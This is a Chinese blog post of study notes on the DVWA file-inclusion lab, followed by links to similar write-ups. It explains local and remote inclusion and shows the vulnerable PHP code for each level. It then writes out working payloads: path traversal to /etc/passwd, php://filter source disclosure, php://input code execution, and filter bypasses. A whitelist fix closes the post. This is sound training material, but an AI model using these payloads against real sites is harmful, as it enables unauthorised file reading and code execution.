DVWA-File Inclusion学习笔记

最新推荐文章于 2024-04-02 15:55:05 发布
最新推荐文章于 2024-04-02 15:55:05 发布
阅读量178 收藏
点赞数
文章标签: php 安全 http 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42739903/article/details/110930122
版权

一、文件包含与漏洞

文件包含:

开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。

文件包含漏洞:

开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。

二、文件包含漏洞用到的函数

require:找不到被包含的文件,报错,并且停止运行脚本。

include:找不到被包含的文件,只会报错,但会继续运行脚本。

require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。

include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。

三、目录遍历与文件包含的区别

目录遍历是可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格,针对本系统。

文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含。

四、文件包含特征

?page=a.php
?home=b.html
?file=content

检测方法

?file=…/…/…/…/etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/…/…/…/…/dir/file.txt

五、DVWA练习

修改php.ini配置文件开启文件包含功能

allow_url_include = on

low


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

?>

分析源码,可以看到没有对page参数做任何过滤。

文件包含时,不管包含的文件是什么类型,都会优先尝试当作 php 文件执行。
如果文件内容有 php 代码,则会执行 php 代码并返回代码执行的结果。
如果文件内容没有 php 代码,则把文件内容打印出来。

尝试利用文件包含漏洞

# 原 URL
http://192.168.1.100/dvwa/vulnerabilities/fi/?page=file1.php

# 本地文件包含,读文件(绝对路径 或 相对路径)
http://192.168.1.100/dvwa/vulnerabilities/fi/?page=../1.txt
http://192.168.1.100/dvwa/vulnerabilities/fi/?page=C:\phpStudy\PHPTutorial\WWW\dvwa\vulnerabilities\1.txt

# 远程文件包含
http://127.0.0.1:81/vulnerabilities/fi/?page=http://www.baidu.com

使用php封装协议读取和写入php文件

因为所有的 php 文件都会当成代码来执行,所以无法读取源码。
如果 flag 在 php 文件中,那么我们就需要想办法来读取 flag。

# 直接读取,PHP 代码直接执行
http://192.168.1.100/dvwa/vulnerabilities/fi/?page=file1.php

# 利用伪协议读取源码
http://192.168.1.100/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=file1.php

读取回显base64源码,解密即可。
利用的是 php://input 伪协议

URL: http://192.168.1.100/dvwa/vulnerabilities/fi/?page=php://input
POST:<?php phpinfo(); ?>

medium


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

分析源码,可以看到使用str_replace函数对http://、https://、…/ 、…\进行了过滤,但可以通过双写来绕过,或者使用绝对路径来绕过

high


<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

分析源码可发现,满足以下两个条件,则报错:

  1. 传过来的 page 里面没有 file* $file
  2. 不等于 include.php

使用file协议绕过,浏览器打开本地文件使用的就是file协议。

http://192.168.1.100/dvwa/vulnerabilities/fi/?page=file://file://C:\phpStudy\PHPTutorial\WWW\dvwa\vulnerabilities\fi\1.txt

以下方式无法读取文件???
http://192.168.1.100/dvwa/vulnerabilities/fi/?page=file://1.txt

impossible

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

分析源码可以看到,使用白名单
page只能为include.php”、“file1.php”、“file2.php”、“file3.php”之一,只允许包含include.php、file1.php、file2.php、file3.php,不能包含别的文件,彻底杜绝文件包含漏洞。

GupiMG
关注
DVWA-master安装包
02-28
这个名为“DVWA-master”的安装包,正是为学习Web安全的爱好者准备的一份宝贵资源。 首先,让我们从安装开始。下载并解压“DVWA-master”压缩包后,你需要一个本地Web服务器环境来运行此应用,如XAMPP或WAMP。这些...
DVWA 笔记(1)
weixin_44371700的博客
04-21 295
**DVWA 笔记1** 一,爆破 第一次接触暴力破解是在攻防世界web里面,题目是这样的: ![这是题目](https://img-blog.csdnimg.cn/20190421201147414.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGV...
DVWA文件包含漏洞
西电卢本伟的博客
03-30 2722
文章目录lowmediumhighimpossible文件上传+包含漏洞getshell云演-phar实验 low 1、本地文件包含: 看看后端代码 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 发现没有对参数page进行任何的检查和过滤,尝试包含一下phpinfo.php文件 提示错误,但是爆出了文件的绝对路径,此时有两种方法成功包含文件 方法一:利用得到的绝对路径 方法二:利用相对路径 2、远程
爆破,命令执行与dvwa靶场
ing_end的博客
02-11 3780
爆破 web21 题目:爆破什么的,都是基操 我们尝试抓包 我们发现用户名和密码被加密,用burp自带解码工具解码 发现用户名和密码中间用冒号隔开 爆破成功 web22 题目:域名也可以爆破的,试试爆破这个ctf.show的子域名 页面失效,提交flag{ctf_show_web} web23 题目:还爆破?这么多代码,告辞! <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-03 11:4
CTFHub技能书解题笔记-RCE-命令注入
qq_43006864的博客
03-31 1126
打开题目是命令注入,题目要求是这是一个在线测试网络延迟的平台,路由器中经常会见到。无任何安全措施,尝试获取 flag。 竟然是没有任何安全措施的。那就开整了。 打开题目是源代码,这个和dvwa上的命令注入就是一样的。 那没啥好说的直接开测了。ping 114.114.114.114. 拼接命令ping 114.114.114.114;ls 找flag。ls了半天,最后再第一步的247711895227.php 的界面源码里找到了 这道题没做任何难度,没有难度。 ...
DVWA笔记(3)--File Inclusion(文件包含)
xiaopan233的博客
02-05 630
file inclusion 文件包含,就是通过php的引入文件的函数,如include,require_once等。访问用户不应该访问到的文件。防御其实也很简单,allow_url_fopen和allow_url_include禁用即可。或者apache的配置中严格限制访问目录即可。 low 乍一看这页面,是通过get方式传值的。我在C盘根目录中建立了一个文件flag.txt。 方式...
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
Dvwa之文件包含全级别学习笔记
Mbys_Lettuce的博客
10-21 989
文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 1668
web 程序中引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含的文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6569
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
DVWA-File Inclusion(文件包含)
Cwillchris的博客
10-28 2329
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
DVWA靶场------File Inclusion(文件包含漏洞)
m0_65712192的博客
11-13 1267
DVWA靶场------File Inclusion(文件包含漏洞)
Kali渗透测试之DVWA系列9——File Inclusion(文件包含)
浅浅的博客
06-14 2926
目录 一、文件包含 二、实验环境 三、实验步骤 Windows 安全等级:LOW 安全等级:Medium 安全等级:High 安全等级:Impossible Linux 安全等级:LOW 安全等级:Medium 安全等级:High 一、文件包含 1、文件包含原理 文件包含:开发人员将相同的函数写入单独的文...
DVWAFile Inclusion(文件包含)
RexHa的博客
10-01 1243
dvwa 文本包含漏洞的解析
DVWA-文件包含(File Inclusion
weixin_58954236的博客
08-19 396
文件包含:开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。文件包含漏洞:开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含。
DVWA之包含漏洞(file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA之包含漏洞(file Inclusion
weixin_45116657的博客
09-10 2791
hahaha
DVWA靶场通关----(4) File Inclusion教程
最新发布
z09364517158的博客
04-02 404
File Inclusion(文件包含),是指当服务器开启了allow_url_include选项时,通过一些PHP的特性函数(比如:include(),require(),include_once()和require_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。这个地方加了一些过滤,将“http://”,“https://”,“../”,“..\”全部替换成了空,这个地方其实可以考虑双写绕过。
DVWA学习File Inclusion(文件包含漏洞)
weixin_40950781的博客
08-18 2426
DVWA学习File InclusionFile Inclusion(文件包含)0x01 何为File Inclusion?1.简介2.相关函数3.文件包含功能4.相关知识5.文件包含漏洞的一般特征6.文件包含的测试0x02 low级别0x02 medium级别0x03 high级别0x04 impossible级别0x05 文件包含漏洞的利用0x06 防御方法 File Inclusion(文...
dvwa-master zip
07-28
dvwa-master zip是一个开源的漏洞脆弱性应用程序,用于进行网络安全测试和漏洞扫描。 具体而言,dvwa-master zip...值得注意的是,dvwa-master zip仅用于合法的安全研究和学习目的,未经授权的攻击行为是不被允许的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值